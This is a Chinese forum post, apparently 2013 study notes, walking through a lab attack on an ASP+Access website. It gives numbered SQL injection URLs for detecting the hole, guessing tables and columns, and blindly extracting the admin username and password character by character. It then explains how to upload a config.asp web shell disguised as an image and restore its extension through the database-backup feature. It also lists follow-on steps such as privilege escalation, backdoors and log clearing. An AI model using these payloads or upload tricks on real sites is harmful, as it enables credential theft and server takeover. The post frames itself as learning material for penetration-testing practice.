设为首页 收藏本站
查看: 1504|回复: 0

[经验分享] 实验十一:sql注入之asp+access案例

[复制链接]

尚未签到

发表于 2018-10-19 11:00:33 | 显示全部楼层 |阅读模式
  仅供学习参考,2013.5.8日学习整理记录
  潜江水产案例
  (sql注入之asp+access)
  实验目的通过注入漏洞上传config.asp
  实验过程如下所示:
  实验前提:在服务器上要搭建好IIS
  开始实验
  把已经编好的web通过共享的方式上传到服务器上,然后解压这个潜江水产的数据包
  文件,然后把这个数据包导入到c:\inetpub\wwwroot下面,接着通过命令行inetmgr打开
  搭建好的默认网站,然后在默认网站中的主目录下面指定潜江水产的路径,然后在配置中的设置中启用父路径,在指引中添加index.asp,然后在网络扩展中把asp给启动
  网站服务器一切准备好后,在客户端来访问一下潜江水产的服务器
  现在我们就要利用编程的简单的查询来推断网站是否存在注入漏洞
  访问网站后,在地址栏输入:http:\192.168.2.4,然后在网页中找到一个武汉水产专家,
  当出现地址为:http://192.168.2.4/shownews.asp?id=41时,这就是典型的注入漏洞
  我们可以用下面可以到shownews.asp中查看一下看有没有“武汉水产专家”,发现找不到,说明这个新闻页面时保存在数据库里面的
  现在我们到数据库中查询一下“select”
  下面是搭建好潜江水产的web页面
DSC0000.jpg

DSC0001.jpg

  http://192.168.2.4/shownews.asp?id=41查询正常
DSC0002.jpg

DSC0003.jpg

DSC0004.jpg

  我们可以用三种方法来确定它存在注入漏洞
  1.http://192.168.2.4/shownews.asp?id=41’查询不正常
DSC0005.jpg


  2.http://192.168.2.4/shownews.asp?>
DSC0006.jpg


  3.http://192.168.2.4/shownews.asp?>
DSC0007.jpg

  4.http://192.168.2.4/shownews.asp?id=41 and select username,password from user查询报错
DSC0008.jpg

  5.http://192.168.2.4/shownews.asp?id=41 and 0(select count(*) from admin)正常访问
DSC0009.jpg

  6.http://192.168.2.4/shownews.asp?id=41 and 0(select count(*) from admin1)不正常访问
DSC00010.jpg

  7.http://192.168.2.4/shownews.asp?id=41 and 0(select count(user) from admin)查询正常
DSC00011.jpg

  8.http://192.168.2.4/shownews.asp?id=41 and 0(select count(password) from admin)
DSC00012.jpg

  9.http://192.168.2.4/shownews.asp?id=41 and  (select top 1 len (user)from admin)>0 正常
DSC00013.jpg

  10.http://192.168.2.4/shownews.asp?id=41 and  (select top 1 len (user)from admin)>1正常
DSC00014.jpg

  11.http://192.168.2.4/shownews.asp?id=41 and  (select top 1 len (user)from admin)>2 正常,知道出现报错就是那个数,这样一个一个的尝试,直到出现报错时为止。那么密码的长度就为那个报错的位数,接下来就是猜密码了
DSC00015.jpg

DSC00016.jpg

  12.http://192.168.1.10/shownews.asp?id=41 and (select top 1 asc(mid(user,1,1))from admin)>0出现错误
DSC00017.jpg

  13.http://192.168.1.10/shownews.asp?id=41 and (select top 1 asc( mid(username,1,1))from admin)>0正常
DSC00018.jpg

  14.http://192.168.1.10/shownews.asp?id=41 and (select top 1 len(username)from admin )>1
DSC00019.jpg

  15.http://192.168.1.10/shownews.asp?id=41 and (select top 1 len(username)from admin )>2  刚刚前面出现了问题,现在又要重新的再来猜一遍,直到猜出报错时为止,那么密码的长度就为出现报错的那个数
DSC00020.jpg

  16.http://192.168.1.10/shownews.asp?id=41 and (select top 1 asc(mid(username,1,1))from admin)>0 现在来猜管理员的帐号
DSC00021.jpg

DSC00022.jpg

DSC00023.jpg

  下面是用小葵来一步一步的破解密码的过程
DSC00024.jpg

DSC00025.jpg

DSC00026.jpg

DSC00027.jpg

DSC00028.jpg

DSC00029.jpg

DSC00030.jpg

DSC00031.jpg

DSC00032.jpg

  17.http://192.168.2.4/shownews.asp?id=41 and (select top 1 len (password)from admin) >0 现在猜密码的长度
DSC00033.jpg

DSC00034.jpg

  18.http://192.168.1.10/shownews.asp?id=41 and (select top 1 asc(mid(password,1,1))from admin)>0 现在就猜密码为多少
DSC00035.jpg

  下面是用小葵来一步一步的破解密码
DSC00036.jpg

DSC00037.jpg

DSC00038.jpg

DSC00039.jpg

DSC00040.jpg

DSC00041.jpg

  现在管理员的帐号已经查出来了,管理员的密码也猜出来了
  接下来就要开始注入了
  在潜江水产网的下面找到“网站管理”,然后输入管理员的帐号和密码就可以直接访问后台
  然后找到新闻的编辑页面,在这里面找到插入图片,你就可以利用这个漏洞来上传图片,也就把config.asp这个文件传上去了,但是这里文件只有jpg,gpf,那么你就要
  回到客户端,把config.asp的后缀名改为gpf或jpg内型的,
  然后找到这个文件存放的地方,在客户端的地址栏中输入这个地址,发现不能够访问
  然后在系统管理中找到上传文件,然后找到数据库备份,然后把文件备份一下,并找到备份的路径
  然后把图片的路径保存在当前的数据库下,然后把保存的数据库的名称的后缀名更改一下,
  然后复制这个地址,然后在地址栏中输入这个confi.asp文件的路径
DSC00042.jpg

DSC00043.jpg

DSC00044.jpg

DSC00045.jpg

DSC00046.jpg

  在这里需要把里面的内容填写一下,然后再上传,然后找到上传后的路径地址
DSC00047.jpg

DSC00048.jpg

DSC00049.jpg

DSC00050.jpg

DSC00051.jpg

DSC00052.jpg

DSC00053.jpg

DSC00054.jpg

DSC00055.jpg

DSC00056.jpg

  下面就可以一步一步的通过config.asp来上传文件,然后提权,然后远程登录,然后做后门,然后清除日志等一系列的操作,在这里我就不演示了
DSC00057.jpg

  总结:仅供学习参考,资料来源于2013.5.8日学习整理,请勿做违法犯禁事情,违者自咎,我只是提供一个学习平台,仅供学习参考,希望大家把这个拿来作为公司的安全防护做漏洞测试,请勿用来作侵害他人财产或者经济损失及个人隐私安全泄露的事情,违者当事人自负,注意,此仅仅是供学习参考借鉴使用,请勿做违法事情


运维网声明 1、欢迎大家加入本站运维交流群:群②:261659950 群⑤:202807635 群⑦870801961 群⑧679858003
2、本站所有主题由该帖子作者发表,该帖子作者与运维网享有帖子相关版权
3、所有作品的著作权均归原作者享有,请您和我们一样尊重他人的著作权等合法权益。如果您对作品感到满意,请购买正版
4、禁止制作、复制、发布和传播具有反动、淫秽、色情、暴力、凶杀等内容的信息,一经发现立即删除。若您因此触犯法律,一切后果自负,我们对此不承担任何责任
5、所有资源均系网友上传或者通过网络收集,我们仅提供一个展示、介绍、观摩学习的平台,我们不对其内容的准确性、可靠性、正当性、安全性、合法性等负责,亦不承担任何法律责任
6、所有作品仅供您个人学习、研究或欣赏,不得用于商业或者其他用途,否则,一切后果均由您自己承担,我们对此不承担任何法律责任
7、如涉及侵犯版权等问题,请您及时通知我们,我们将立即采取措施予以解决
8、联系人Email:admin@iyunv.com 网址:www.yunweiku.com

所有资源均系网友上传或者通过网络收集,我们仅提供一个展示、介绍、观摩学习的平台,我们不对其承担任何法律责任,如涉及侵犯版权等问题,请您及时通知我们,我们将立即处理,联系人Email:kefu@iyunv.com,QQ:1061981298 本贴地址:https://www.yunweiku.com/thread-623551-1-1.html 上篇帖子: SQLPS不同版本的差异 下篇帖子: 玩转MaxCompute studio SQL编辑器
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

扫码加入运维网微信交流群X

扫码加入运维网微信交流群

扫描二维码加入运维网微信交流群,最新一手资源尽在官方微信交流群!快快加入我们吧...

扫描微信二维码查看详情

客服E-mail:kefu@iyunv.com 客服QQ:1061981298


QQ群⑦:运维网交流群⑦ QQ群⑧:运维网交流群⑧ k8s群:运维网kubernetes交流群


提醒:禁止发布任何违反国家法律、法规的言论与图片等内容;本站内容均来自个人观点与网络等信息,非本站认同之观点.


本站大部分资源是网友从网上搜集分享而来,其版权均归原作者及其网站所有,我们尊重他人的合法权益,如有内容侵犯您的合法权益,请及时与我们联系进行核实删除!



合作伙伴: 青云cloud

快速回复 返回顶部 返回列表